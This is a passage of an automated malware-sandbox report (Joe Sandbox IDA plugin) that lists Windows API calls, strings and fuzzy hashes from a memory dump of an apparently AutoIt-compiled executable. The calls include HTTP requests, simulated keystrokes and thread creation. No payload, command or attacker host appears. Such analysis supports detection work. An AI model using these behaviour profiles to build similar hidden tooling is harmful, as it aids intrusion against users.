                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 00912CA0
                                                                    • _free.LIBCMT ref: 00912CAB
                                                                    • _free.LIBCMT ref: 00912CB6
                                                                    • _free.LIBCMT ref: 00912CC1
                                                                    • _free.LIBCMT ref: 00912CCC
                                                                    • _free.LIBCMT ref: 00912CD7
                                                                    • _free.LIBCMT ref: 00912CE2
                                                                    • _free.LIBCMT ref: 00912CED
                                                                    • _free.LIBCMT ref: 00912CFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
                                                                    • Instruction ID: e14753dac2e16fa8455a3e11404f128b18a19feb055b27da55dcb0e7ef416de1
                                                                    • Opcode Fuzzy Hash: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
                                                                    • Instruction Fuzzy Hash: 5611667660010CAFCB02FF58D942DDD3BA9FF45360F5145A5FA585F222D631EAA09B90
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008E1459
                                                                    • OleUninitialize.OLE32(?,00000000), ref: 008E14F8
                                                                    • UnregisterHotKey.USER32(?), ref: 008E16DD
                                                                    • DestroyWindow.USER32(?), ref: 009224B9
                                                                    • FreeLibrary.KERNEL32(?), ref: 0092251E
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0092254B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: bf8f5b28fd530d39e9493f2189dd0d14850ef324098813e9b4c2b6e11e53624a
                                                                    • Instruction ID: 02013cef18a40acc03f4c57eaff4ee451065160091027f607a79571a06703b10
                                                                    • Opcode Fuzzy Hash: bf8f5b28fd530d39e9493f2189dd0d14850ef324098813e9b4c2b6e11e53624a
                                                                    • Instruction Fuzzy Hash: 50D1A071701262DFCB29EF15D899A29F7A4FF06700F1481ADE54AAB266CB30ED12CF51
                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00957FAD
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00957FC1
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00957FEB
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00958005
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958017
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958060
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009580B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                    • String ID: *.*
                                                                    • API String ID: 769691225-438819550
                                                                    • Opcode ID: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
                                                                    • Instruction ID: e3fd8b3d53bcd208d009c212489cd07463d19cc7ba447c093632459f92bf3a8b
                                                                    • Opcode Fuzzy Hash: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
                                                                    • Instruction Fuzzy Hash: E28190725083419BCB20DF56D845AAAF3E8BB85311F144C5EFC85D7260EB34DE4D8B52
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 008E5C7A
                                                                      • Part of subcall function 008E5D0A: GetClientRect.USER32(?,?), ref: 008E5D30
                                                                      • Part of subcall function 008E5D0A: GetWindowRect.USER32(?,?), ref: 008E5D71
                                                                      • Part of subcall function 008E5D0A: ScreenToClient.USER32(?,?), ref: 008E5D99
                                                                    • GetDC.USER32 ref: 009246F5
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00924708
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00924716
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0092472B
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00924733
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009247C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
                                                                    • Instruction ID: f459a7a427666343664f9d688d80406d02b1a59f98d127a5e1753c2340b8962d
                                                                    • Opcode Fuzzy Hash: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
                                                                    • Instruction Fuzzy Hash: C6710431500249DFCF21CF64E984AFA3BB9FF4A324F244269ED659A1AAC7319C81DF50
                                                                    APIs
                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009535E4
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • LoadStringW.USER32(009B2390,?,00000FFF,?), ref: 0095360A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString$_wcslen
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 4099089115-2391861430
                                                                    • Opcode ID: 76ab95535a791d4ceb4a9ef5697f1e7ca07a94b7ea009307d0b86f9d43203410
                                                                    • Instruction ID: d9dd0f9dc69d9fe614366c1bad60d1bb7750b34158ba56aa9acb4e9c4654fadc
                                                                    • Opcode Fuzzy Hash: 76ab95535a791d4ceb4a9ef5697f1e7ca07a94b7ea009307d0b86f9d43203410
                                                                    • Instruction Fuzzy Hash: 4E519C72C00249BADF15EBA5DC42EEEBB78FF45340F544125F505B21A1EB302B98DBA1
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C29A
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C2CA
                                                                    • GetLastError.KERNEL32 ref: 0095C322
                                                                    • SetEvent.KERNEL32(?), ref: 0095C336
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0095C341
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
                                                                    • Instruction ID: 4293d18563b53860700ae48e82032d2879504f4939a338aae23fe367051d770d
                                                                    • Opcode Fuzzy Hash: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
                                                                    • Instruction Fuzzy Hash: 9B316DF2504308AFD721DF668C89AAB7AFCEB49745F10851DF84A92211DB34DD489B60
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00923AAF,?,?,Bad directive syntax error,0097CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009498BC
                                                                    • LoadStringW.USER32(00000000,?,00923AAF,?), ref: 009498C3
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00949987
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 858772685-4153970271
                                                                    • Opcode ID: 4514b9d7480fd7e4d098d2ad3156248d9bdce2998d832eaa33fb50fb4cc70e04
                                                                    • Instruction ID: 59195ba2c020c15fb384158f5693e5e2e07427437e3bef362e34760ef28e4804
                                                                    • Opcode Fuzzy Hash: 4514b9d7480fd7e4d098d2ad3156248d9bdce2998d832eaa33fb50fb4cc70e04
                                                                    • Instruction Fuzzy Hash: DE21A332C0025EBBCF15AF94CC0AEEE7779FF19304F044829F515A60A2EB719A58DB61
                                                                    APIs
                                                                    • GetParent.USER32 ref: 009420AB
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 009420C0
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0094214D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1290815626-3381328864
                                                                    • Opcode ID: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
                                                                    • Instruction ID: 98fbf9e1045b1022db972303336458c94e90937eaa2e856b8f3de4a620b66834
                                                                    • Opcode Fuzzy Hash: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
                                                                    • Instruction Fuzzy Hash: F8110AB678C707B9F6152324DC06DE6379CEB4A729B61001AF704A50D1EA6558415664
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
                                                                    • Instruction ID: 17826d97d57f9a2a409723b572868fd289e4cfc2c62325ecba2a569268ee59c6
                                                                    • Opcode Fuzzy Hash: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
                                                                    • Instruction Fuzzy Hash: BFC1E274F0424DAFDB21EFA8D851BEEBBB4AF4D310F184199E415A7392C7349982DB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                    • String ID:
                                                                    • API String ID: 1282221369-0
                                                                    • Opcode ID: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
                                                                    • Instruction ID: b10a61167c78928759c3c90e78c1cb754dd7cdf11b36f0edd9d2007a50960797
                                                                    • Opcode Fuzzy Hash: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
                                                                    • Instruction Fuzzy Hash: D86138B1B4430CAFDB21AFB49941BEA7BA9AF85320F04416DF941973C1D6319D82D750
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00975186
                                                                    • ShowWindow.USER32(?,00000000), ref: 009751C7
                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 009751CD
                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 009751D1
                                                                      • Part of subcall function 00976FBA: DeleteObject.GDI32(00000000), ref: 00976FE6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0097520D
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0097521A
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0097524D
                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00975287
                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00975296
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                    • String ID:
                                                                    • API String ID: 3210457359-0
                                                                    • Opcode ID: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
                                                                    • Instruction ID: 1c1a24fba45bb68cc614f4c831a1d6aef6f4f3d3a593ee36e7cbf6ea0ad764b9
                                                                    • Opcode Fuzzy Hash: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
                                                                    • Instruction Fuzzy Hash: 8051C272A58A08BEEF609F24CC46B983B69FB05322F55C005F62C962E1C7B5E980DB41
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00936890
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009368A9
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009368B9
                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009368D1
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009368F2
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00936901
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093691E
                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0093692D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID:
                                                                    • API String ID: 1268354404-0
                                                                    • Opcode ID: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
                                                                    • Instruction ID: 9c4f5e64df5b05725436444845131057af769675a71874d03199d90dee5110ef
                                                                    • Opcode Fuzzy Hash: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
                                                                    • Instruction Fuzzy Hash: 195168B1610209EFDB24CF25CC95BAA7BB5FB48760F104518FA56D72A0DB70E990DB50
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C182
                                                                    • GetLastError.KERNEL32 ref: 0095C195
                                                                    • SetEvent.KERNEL32(?), ref: 0095C1A9
                                                                      • Part of subcall function 0095C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
                                                                      • Part of subcall function 0095C253: GetLastError.KERNEL32 ref: 0095C322
                                                                      • Part of subcall function 0095C253: SetEvent.KERNEL32(?), ref: 0095C336
                                                                      • Part of subcall function 0095C253: InternetCloseHandle.WININET(00000000), ref: 0095C341
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 337547030-0
                                                                    • Opcode ID: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
                                                                    • Instruction ID: 0f2b23a9740c96e01cc2da8f24400dd22d5ccdb5deb80c8f0175f09d98898de9
                                                                    • Opcode Fuzzy Hash: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
                                                                    • Instruction Fuzzy Hash: EF317CB1204701AFDB21DFA6DC44A66BBEDFF58312F00441DF96A86611DB34E858ABA0
                                                                    APIs
                                                                      • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                      • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                      • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 009425BD
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009425DB
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009425DF
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 009425E9
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00942601
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00942605
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0094260F
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00942623
                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00942627
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
                                                                    • Instruction ID: 4d9cdf693725b0f06d960dfcc256a99f7ea70c7d4a47327737e4355466648742
                                                                    • Opcode Fuzzy Hash: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
                                                                    • Instruction Fuzzy Hash: EE01D871398210BBFB1067689C8AF593F59DF8EB11F500015F318AE0D1C9E11484DA69
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00941449,?,?,00000000), ref: 0094180C
                                                                    • HeapAlloc.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941813
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941828
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00941449,?,?,00000000), ref: 00941830
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941833
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941843
                                                                    • GetCurrentProcess.KERNEL32(00941449,00000000,?,00941449,?,?,00000000), ref: 0094184B
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 0094184E
                                                                    • CreateThread.KERNEL32(00000000,00000000,00941874,00000000,00000000,00000000), ref: 00941868
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
